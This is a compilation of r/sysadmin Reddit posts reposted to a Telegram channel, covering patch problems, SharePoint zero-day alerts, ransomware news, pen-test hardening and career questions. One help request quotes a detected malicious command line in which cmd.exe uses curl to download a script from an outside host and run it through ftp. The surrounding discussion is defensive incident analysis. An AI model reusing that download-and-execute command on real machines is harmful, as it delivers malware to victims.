-
Reddit SystemAdmin. Thanks @reddit2telegram and @r_channels.
CVE-2025-26647 RHEL AD joins with realmd/sssd
hi,
anyone else having issues with RHEL AD joins with realmd/sssd after the patch?
https://redd.it/1m75x5m
@r_systemadmin
Sudden EXTERNAL tag on all inbound emails in Microsoft 365?
Was this change announced?
EDIT: on all inbound external mails. Seems to affect German tenants.
https://redd.it/1m71itq
@r_systemadmin
The "Google Cloud Console" - forgive my use of the F-word, but this is as tame as it gets!
Oh Google Cloud, you magnificent monument to user-maddening incompetence!
I’m the SUPER ADMIN of my damn organization, yet trying to create a simple project feels like trying to defuse a bomb with a spoon while blindfolded. First hurdle? Select a folder. Simple, right? Nope. Because apparently, even though I’m Super Admin, I don’t have resourcemanager.folders.create permission to create or access folders. That’s right. Every fucking click, every fucking step — a goddamn roadblock. A stupid permission or setting I have to give to myself before I can get a simple job done that should’ve taken 3 minutes and instead has turned into hour 2 of pure, unrelenting bullshit. Thanks, Google. Really.
Searching for roles is a whole other sadistic delight. “Project”? Nothing. Nada. Zero. So what do I do? Manually type roles/resourcemanager.projectCreator like some damn codebreaker because your UI clearly thinks it’s a game of "How much can we fuck with this user before they break to our will" and desperately hold off treating your pc to a sledgehammer. Spoiler, I'm looking around the room.
Oh, and creating a folder? FAT chance super admin! You're missing six different permission roles to do something so fucking simple. Again. And try to find them in the list - NICE TRY BUDDY!! The UI won’t show it unless I spell out the entire goddamn role ID like I'm reading an incantaiontion from the necromonger. Army of the dead and chainsawed off arm was easier was get through.
And your OAuth consent screen, Google. Just brillant. Congrats of building the real dream - just like most sweat inducing nightmares I have fill out endless forms that make the DMV look like a joyride. Logos, emails, scopes and an endless, soul-sucking vortex of red tape just to pull analytics data, not to steal the whole damn internet.
Google Cloud Platform: you miserable thing, you’re not just frustrating, you’re a monument to obnoxious, incompetent, user-maddening garbage design that seems engineered solely to destroy any shred of sanity I had left. Is this the truman show?? Where does it end?!
At this point, I’m this close to putting my laptop into a vice and checking into rageaholics.
If you’ve survived this hell, consider yourself a warrior. If not… good luck. You’ll need it. Keep the xanax close.
Now... where did I put that fucking sledgehammer?
https://redd.it/1m6xuf0
@r_systemadmin
Another ticket from hell
This one really pisses me off because malware is my specialty and it has me completely stumped. Got an alert from our monitoring system that CMD tried to run something with odd behavior and was terminated. I have no idea what called cmd.exe to do this. The report says "explorer.exe"
The detection was triggered for 'C:\\WINDOWS\\system32\\cmd.exe' /i /c cd C:\\Users\\[username\] && curl.exe --proto-default httP -L -o 'dcf.log' keanex[.\]com/lks[.\]php && ftp -s:dcf.log && cfapi : 2470.', which was spawned from 'explorer.exe' . The command line was used to download and execute files from a remote server, potentially part of a malware attack
Isn't that linux bash commands? This is windows 11.
I can't find a damn thing about Keanex except it's a youtuber that makes or sells headphones or something and the website was a Philippines network solution provider in 2012 then went silent on the wayback machine. That domain has a completely safe/neutral reputation in every checker.
Now their site loads an empty HTML tag.
I tried to load that exact php script in firefox on our linux testing VM, got a 403 error.
Her web history didn't load a website in the last hour and nothing today was malicious, in all browsers btw.
No files acting suspiciously in Adobe Reader, Word, Excel file history. Nothing in downloads. Checked entire system with Autoruns. Only unsigned code was this stupid check scanner we've always used that's required for 1 bank. Never had a problem with that. Every single runonce, task, etc was accounted for. Full antivirus scan came up with nothing.
How the hell can a command window just randomly open? What could cause explorer to be able to call cmd.exe? Why can't I find the source?
In the meantime, I blocked that domain in the hosts file but I cannot just leave this, obviously. I'd blow it away but this is the #1 computer we cannot do that to without it being absolute hell on Earth to reload. It would probably take a week and I'm on PTO tomorrow. Not happy with this one. Any insights on this type of attack, if it was legitimate traffic somehow, or what can cause this and where to look for it would be very appreciated. Also, what could dcf.log be, was it going upward or downward via FTP, would that command syntax even run on windows, does windows even use CURL.exe, and why is this week such a nightmare?
https://redd.it/1m6nhfq
@r_systemadmin
Third-Party company wants to install F5 Endpoint Inspection on our systems
I don't have any experience with this software but a third-party company wants to install F5 Endpoint Inspection on our company devices that will access their shared files through the F5 VPN. From my understanding this will give the third-party company access to a ton of information about our devices and security measures which is already something I am not too keen on. Am I correct in not wanting to give this company access to our devices or is this software not as extreme as it seems? The documentation is pretty spotty and I don't know if it also gives them remote access to execute actions on our devices. Any information or advice on this software would be appreciated.
Edit: Confirmed what I had thought, we will definitely not be allowing this software to be installed. If the VPN doesn't work without it we will create a standalone PC with no access to our network to work with their files. This was our original fallback plan but wanted to confirm.
https://redd.it/1m6lsgs
@r_systemadmin
Does anyone celebrate Sysadmins Day any more?
It's coming up on Thursday but haven't seen anything about it other than a few isolated questions.
https://redd.it/1m6lfm7
@r_systemadmin
Cluster Service might fail to function properly after installing KB5062557
After installing the July Windows security update (the Originating KBs listed above), the Cluster Service on Windows Server 2019 might repeatedly stop and restart, causing nodes to fail to rejoin the cluster or enter quarantine states, virtual machines to experience multiple restarts, and frequent Event ID 7031 errors within event logs. This issue only occurs in configurations using BitLocker with Cluster Shared Volumes (CSV).
Workaround:
If you need help to manage this issue on your organization and apply a mitigation, please contact Microsoft’s Support for business.
Next Steps: We are working to include the resolution in a future Windows update. Once the update with the resolution is released, organizations will not need to install and configure the mitigation provided from Microsoft’s Support for business.
https://redd.it/1m6enak
@r_systemadmin
UK to ban ransomware payments by public sector organizations
Source: The Register
Additional source: Bleeping Computer
I'm curious if anybody on the UK side of things has thoughts they'd be willing to share regarding this. I'd hope that anybody with enough control over their org's security posture has a better game plan for ransomware than "pray the insurance pays out", but I'm sure there are at least a few orgs that will be scrambling as a result of this.
https://redd.it/1m6e9d6
@r_systemadmin
Seagate Expansion Desktop 24TB doesn't show SMART data with smartmontools. CrystalDiskInfo works.
Have you managed to use smartmontools (Linux version) with this Seagate external HDDs? The only way I managed to get some info was using these parameters:
>root@ubi-main:/# /usr/local/sbin/smartctl -a -d scsi -T permissive /dev/sdb
smartctl 7.5 2025-04-30 r5714 [x86_64-linux-5.15.0-144-generic\] (local build)
Copyright (C) 2002-25, Bruce Allen, Christian Franke, www.smartmontools.org
=== START OF INFORMATION SECTION ===
Vendor: Seagate
Product: Expansion HDD
Revision: 1802
Compliance: SPC-4
User Capacity: 24,000,277,249,536 bytes [24.0 TB\]
Logical block size: 512 bytes
Physical block size: 4096 bytes
LU is fully provisioned
Logical Unit id: 0x3e543137574d4443
Serial number: 00000000REDACTED
Device type: disk
Local Time is: Tue Jul 22 06:46:28 2025 UTC
SMART support is: Unavailable - device lacks SMART capability.
=== START OF READ SMART DATA SECTION ===
Current Drive Temperature: 0 C
Drive Trip Temperature: 0 C
Error Counter logging not supported
No Self-tests have been logged
This is the very latest version of smartctl, and no luck.
Using a Windows box, CrystalDiskInfo just displays everything.
Any ideas how to make this work under Linux? Thank you.
https://redd.it/1m6avxl
@r_systemadmin
CVE-2025-53770: Anyone else lowkey panicking about what’s actually sitting in SharePoint?
This new SharePoint zero-day (CVE-2025-53770) is nasty - unauthenticated RCE, CVSS 9.8, with active exploitation confirmed by CISA. It’s tied to the ToolShell chain, and apparently lets attackers grab machine keys and move laterally like it’s nothing.
We’re jumping on the patching, but the bigger panic is: what is even in our SharePoint?
Contracts? PII? Random internal stuff from years ago? No one really knows.. And if someone did get in, we’d have a hard time saying what was accessed.
Feels like infra teams are covered, but data exposure is a total black box.
Anyone else dealing with this? How are you approaching data visibility and risk after something like this?
https://redd.it/1m6829t
@r_systemadmin
What’s the most ridiculous or hilariously clueless question an employee has ever asked you as a sysadmin?
I’m working on a light-hearted piece for System Admins Day and thought this community would have some gold. Would love to hear your funniest, weirdest, or most absurd helpdesk stories. Drop them below!
https://redd.it/1m6611d
@r_systemadmin
On-Prem Sharepoint servers compromised
https://research.eye.security/sharepoint-under-siege/
CVE Update Guide: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53771
What to do: https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/
(I was supposed to be off today)
https://redd.it/1m5oy1v
@r_systemadmin
PSA: Disable Windows Script Host / VBScript If You Don't need it
Microsoft announced with the release of Windows 11 24H2 they migrated VBScript / Windows Script Host to a Feature on Demand. For 24H2 Until 2027 this will be on by default, and after 2027 turned OFF by default, with removal entirely "sometime" after that.
https://techcommunity.microsoft.com/blog/windows-itpro-blog/vbscript-deprecation-timelines-and-next-steps/4148301
If you have no reason to have this on, it can be turned off as a preventative measure. Any of these will work. Straight dism, powershell, or invoke powershell for a remote command.
DISM /Online /Remove-Capability /CapabilityName:VBSCRIPT~~~~
Remove-WindowsCapability -Online -Name VBSCRIPT~~~~
powershell.exe -executionpolicy bypass -command {"Remove-WindowsCapability -Online -Name VBSCRIPT~~~~"}
We just turned it off Org wide, and will be reenabling it on a case by case basis. (We have a ancient internal app that may require it, we're testing, for a dozen or so users).
We just had a C-Suite click on something. Not sure what. But it was able to get through our EDR. After isolating the endpoint did a bit of analysis on it, it made some folders in %localappdata% folder, put some VBS files in there that ran, which would download a file from a URL, rename it to another vbs file and run it and created tasks to run it every so often. In his case it only installed a Crypto-Miner application that did get picked up by our EDR, which prompted the isolation and analysis. However, with VBScript turned off, it would have stopped in its tracks. Or least been one less avenue it could have used.
https://redd.it/1m5oi80
@r_systemadmin
Weeks worth of work down the drain…
I work in k12 public schools. We have a staff of roughly 600 people. Each one of those people have a MacBook. Those MacBooks used to be managed by FileWave but we recently switched to Mosyle. Mosyle offers some great features for stronger security and convenience for the end-user.
For example, users can now use Google workspace to authenticate into their MacBooks. This is good for the end-user because now they just need one password for both email and computer logins (didn’t stop everyone from bitching about 2FA..)
Our staff also used 802.1x to authenticate into the WiFi but for those of you who don’t know, MacBooks can’t authenticate using EAP-TLS/802.1x before logging in.
I automated this and now staff members not only log in automatically when they open their device BEFORE login, but they ALSO have the option to manually enter their credentials if it fails for whatever reason.
Everyone is starting to come back from summer and they’re either forgetting how to do things WiFi related or they need to just connect to an SSID so their laptops can pull any necessary changes from Mosyle so they can authenticate.
SCEP officially failed ONCE in the couple months it’s been online and that was due to a windows update. Since then it’s been smooth sailing and all other issues have been client side.
Now my boss is telling me to axe SCEP because the intermittent issues with the clients and NOT the server. He says there is 0 redundancy with it, but the redundancy is there. The redundancy is end-users being able to authenticate manually. So rather than going through the process of training our end-users to use the new automated system (like we do with everything else) we are just going to axe the whole system and go back to how things were before SCEP because “the people know how to use that if things break”.
TL;DR - So down the drain goes security improvements, automation and weeks of work because my boss doesn’t want to go through the expected rough patches of end-users coming back and forgetting how to use their shit. Nothing better than moving backwards.
https://redd.it/1m5jg93
@r_systemadmin
Tapes vs "Immutable storage"
Seem like every other storage vendor is selling their "immutable storage" solution and is downplaying Tapes as old tech. Which is driving business leaders to look replace those Tape systems.
But I am more and more convinced that tapes (or any storage where you physically disconnect the backup media) are the only good recovery solution for ransomware type events. (As long as it is tested)
Are you guys seeing the same thing?
https://redd.it/1m5holp
@r_systemadmin
Insurance company going to do Internal Pen Test. I attempted to Lock the network down beforehand.
The company I work for has their insurance company running an internal pen test where they connect a box to the internal network and attempt to scan the network. Before they came out, I did the following: was it enough?
1) Upgraded all domain and file servers to Windows Server 2025. Set the domain and forest function level to server 2025. And made sure all servers were fully patched.
2) I have Meraki Switches, and I already have many settings enabled, including DHCP Guard, RA Guard, and DAI. I added firewall rules to drop all LLMNR NBT-NS traffic on the network. I already had the registry and GPO objects set, but Responder was still showing traffic. With the firewall rules in place, responder was completely quiet. I also already had SMB signing enabled and LDAP channel binding enabled as well.
3) I have Dell servers with iDRAC, and I upgraded all the firmware on the servers.
4) All PCs and servers have an EDR solution installed and are configured to reboot automatically for Windows updates.
5) I have Ricoh copiers, and I configured the access control on the printers to only allow traffic from the print server.
Do you think this is enough, or should I have done more?
https://redd.it/1m76i2f
@r_systemadmin
158-year-old company forced to close after ransomware attack precipitated by a single guessed password — 700 jobs lost after hackers demand unpayable sum
https://www.tomshardware.com/tech-industry/cyber-security/158-year-old-company-forced-to-close-after-ransomware-attack-precipitated-by-a-single-guessed-password-700-jobs-lost-after-hackers-demand-unpayable-sum
Invest in IT security, folks. Immutable 321 backups, EPPs, Fine grain firewall rules, intrusion detections, MFAs, etc.
https://redd.it/1m6z0e6
@r_systemadmin
Team members using AI for everything and it’s driving me nuts
Why is it i see that all the team members i work with make no effort to learn the proper way to troubleshoot and instead ask the AI questions as if they don’t have their jobs to learn that information and make sense of it?
It’s very apparent with team members who have no idea what they are doing and use 0 discretion with what they bring from it and it’s driving me NUTS.
https://redd.it/1m6usfk
@r_systemadmin
Sysadmin for 200 people, completely self-taught – now got an offer from an MSP. Would you switch?
I’ve been a full-time sysadmin in a mid-sized company (200 employees) for 2 years - Germany - No formal training – everything self-taught. Before that, I was self-employed in a different field, but already handled IT for ~80 people.
Now I am the entire internal IT – a true one-man army.
I manage:
Microsoft 365 tenant
Google Workspace
HubSpot
Asana
Atlassian (Jira/Confluence)
Our custom backend
All hardware, licenses, support, user management
I introduced and set up almost everything myself, documented it, automated a lot. I’m the only one who actually understands how all the tools work and how they’re connected.
No bureaucracy, no micromanagement, no unnecessary processes. I decide what to do, when, and how. Sounds great – but there’s a catch.
For over a year, I’ve been told I’d get support from a senior – still hasn’t happened.
Over the last 7 months I’ve racked up 100+ overtime hours. Even when I’m on vacation, I have to be available because some things just don’t work without me. SharePoint is full of documentation, but it’s useless if no one even knows where to start.
Current conditions:
4,400 gross/month
30 days of vacation (22 used/planned this year – incl. 10 carried over)
→ So again 18 days rolled over into next year
25 days of workation (10 used)
Now I’ve got an offer (wasn’t actively looking):
Admin at an MSP
€5,400 gross/month
30 vacation days
Company car
Unlimited workation
Part of a 20-person IT team
Pros: Significantly better pay, a team, a company car, I’m no longer on my own.
Cons: Less freedom, more documentation, more coordination, more rules. I’d no longer just decide everything myself.
Right now, I don’t really have to report to anyone. That gives me a lot of freedom – but also a lot of responsibility and stress.
Would you take the offer or stay?
https://redd.it/1m6rbbn
@r_systemadmin
How are y'all handling the Windows 11 upgrade for 100% remote users that cannot come to an office?
I'm a lowly tier 2 tech trying to finish the upgrade before Microsoft makes us open the wallet, and I'm down to the final few dozen computers. I've only got two users this applies to, thankfully. I tried getting it done with Windows update as that seemed like the easiest route and it's failing with a generic error.
The computers are domain joined, and using the ISO to do the inplace upgrade fails until the computer is taken off the domain.
The only other method we have, that also is the only one that not only never fails but also bypasses the compatibility issues, is MDT. But that's not viable for this.
I've asked if the company will ship their computers to my building and back to them, but they said no.
How have you guys been tackling this scenario?
https://redd.it/1m6ltzc
@r_systemadmin
MSPs/sysadmins with a lot of VMs deployed, how often do your backups fail?
Are they just flawless 24/7? Are there some failures here and there with automatic retries being successful? Do they fail a lot and need manual intervention to fix?
https://redd.it/1m6flzm
@r_systemadmin
Microsoft: Windows Server KB5062557 causes cluster, VM issues clarification
I believe the update is ok for non-cluster servers but wanted to check with the greater community before rolling out across the board.
Microsoft: Windows Server KB5062557 causes cluster, VM issues
"After installing the July Windows security update (the Originating KBs listed above), the Cluster Service on Windows Server 2019 might repeatedly stop and restart, causing nodes to fail to rejoin the cluster or enter quarantine states, virtual machines to experience multiple restarts, and frequent Event ID 7031 errors within event logs," Redmond explained.
https://redd.it/1m6e4xa
@r_systemadmin
Does anyone else get triggered by a user simply messaging the word “Hello”?
It’s annoying when you open Teams and just see multiple people only messaging one word.
https://redd.it/1m6bzmt
@r_systemadmin
Microsoft now prevents you from looking up all domains in an Entra tenant while unauthenticated
Just saw MC1081538 in the message center, which announced updates to the Get-FederationInformation cmdlet. Ultimately, this change limits the data that is returned from the Autodiscover endpoint, further details in this article...
Previously, you could use tools like AADInternals on their public OSINT tool to look up all domains in a tenant without any authentication, but now you cannot :(
https://redd.it/1m68liw
@r_systemadmin
Why do users do this?
Printer decides to stop working for the day, but actually just needs some updated print server configuration. I send out both email and chat comms to give everyone a heads up.
Me: clearly working on the printer, admin panel open and laptop on the side
User 1: hey the printer isn’t working..
Me: stares
Few minutes later
User 2: hey I cant print, do you know what’s going on?
Me: ignores user 2
User 2: so when can you fix it?
Am I missing something here? Are they simply trying to make some human interaction or are they just dense? Wondering if I should start drinking on the job.
https://redd.it/1m66ywu
@r_systemadmin
Completely stumped by this mail routing issue
Need to get out of some hot water here because the CIO implied I did this on purpose.
A high level employee sent an email to an external person via Outlook desktop client.
It went to me but also to him. Ended up in my inbox in Outlook desktop client specifically.
There are no mail flow rules that would do this and the message trace would have named the rule by name if it was.
Message trace says "TRANSFER" event occurred and that's it.
Message header doesn't mention me at all.
This happened 4 months ago to just 1 email and we never found out why.
I'm not a delegate on her inbox. Nothing weird going on with a distro list.
Everything I found online has been disproven or is extremely unlikely.
Anyone ever see this? REALLY need to solve this one.
https://redd.it/1m5qcf2
@r_systemadmin
Lost Three Days Because I Ignored A Button
I was tasked with upgrading my Enterprise devices from Home to Pro to comply with cybersecurity insurance policy, to centrally manage everything and to, well, sysadmin.
I attempted to use a generic product key with a generic ISO file for software installation, because that's the SOP on Reddit, Spice works, Google, etc.
I have twenty tabs open describing the same SOP:
1. Disconnect PC from Internet
2. Use the generic key
3. Reboot from Home to Pro, then activate
But the installation for Home to Pro failed.
I should also add I was provided a product key by my Cloud Solution Provider (CSP).
On the download page, I ignored the "Download" button for the software's ISO file. I copied only the product key. I did wonder why the button was there, and why I was downloading a disk, perhaps for creating a bootable USB as that's all the experience I had with .iso files up to now. This wouldn't work for remote users so that helps explain why I ignored the button.
Then I tried to use this key with a generic, pre-existing ISO file I already had - the multi-edition ISO on the Windows page.
The issue was resolved by understanding that the provided product key was specifically tied to the .iso installation files provided by the CSP. ☠️ But I didn't understand this because on Google and everywhere, even Microsoft reps posted the SOP above.
The correct procedure was:
1. Return to the download page provided by the CSP.
2. Click the "Download" button to obtain the specific ISO file associated with the purchased license.
3. Use this downloaded ISO for the installation
Now I was able to upgrade the computers.
Jesus Christ I just lost 3 days over 3 seconds because I'm inexperienced and failed to read a button because I didn't want to understand what it did... But at least I solved the age-old question of "Upgrade Home to Pro for Business Premium, but invalid key".
https://redd.it/1m5pdq5
@r_systemadmin
Windows 11 search super slow after a fresh reimage.
We freshly imaged a PC and noticed very slow load times when clicking start and searching something, like paint. Also noticed very slow Edge response times when opening websites. I’m currently on 24h2 (OS Build 26100.4349). I’ve tried disabling search index via registry and resetting the CBS Appx via powershell and rebooting. Still seeing massive slow times searching an application. It takes about 4 minutes before the results come back. If you click off it and search again, it does the same thing, and just searches for 4 minutes.
Any ideas? Anyone seen this before?
https://redd.it/1m5k5es
@r_systemadmin
Company Being Sold
My company (US based) recently announced that we will be sold in 2027 or 2028. Those are the only details we have been provided. I'm in the process of planning out projects for the rest of this year and next year but finding it really hard knowing the company is being sold. I am thinking of checking with the team to see what interests them our what skills/projects do they want to do to help boost their resume. That seems like a much better use of time than trying to improve efficiency or save money.
Had any one else gone through something similar? Any tips on finding projects that can be meaningful and not just to kill time?
https://redd.it/1m5hp8r
@r_systemadmin
I want to switch to sysadmin
I'm a software developer (web/mobile) with 3 years of experience and I kind of hate my work now (not that i'm employed atm). I want to switch fields and want to work in sys admin. I have seen a recent posting for system administrator which I do not qualify for. But it's the junior position ( 1 year of experience). As a dev, i've used linux and I'm comfortable using it but i know its not nearly enough. As i said its a junior position, so expectations will be lower for me and critical/important things will be handled by someone with more experience.
My question is, Which certs can i do to get knowledge that will make me eligible for this position? How much time would be needed realistically if i can put 8-10 hours daily? Also how can I practice as no one will give access to their system for practice and I can't afford vps. can I simulate system in docker? if so, is there any lighter alternative of it (I've a laptop that will hang with docker desktop).
# Job Description / Key Result Areas:
The roles and responsibilities include one or more of the following:
Administer and maintain AIX & Linux servers (production, development, and testing environments).
Install, configure, and optimize operating systems and infrastructure.
Manage storage provisioning, decommissioning, and SAN performance.
Ensure server stability, availability, and compliance with IT policies.
Handle system upgrades, migrations, backups, and disaster recovery.
Automate tasks using Shell/Bash scripts.
Monitor and manage SLAs, vendor escalations, and support contracts.
Conduct audits and ensure compliance with OEM best practices.
Provide 24/7 support and timely incident resolution.
Recommend and implement operational improvements.
Design systems focusing on security, scalability, and recovery.
Perform capacity planning, health checks, patching, and monitoring.
Possess a deep understanding of virtualization.
Exhibit analytical and team collaboration skills.
Create documentation and use Microsoft Office Tools effectively.
# Essential Skill Requirements:
Interface with vendors to resolve issues and recommend hardware/software.
Strong oral and written communication and presentation skills.
Ability to work independently and solve diverse problems.
Multitasking capabilities.
Teamwork skills (internal and external collaboration).
https://redd.it/1m5f6fk
@r_systemadmin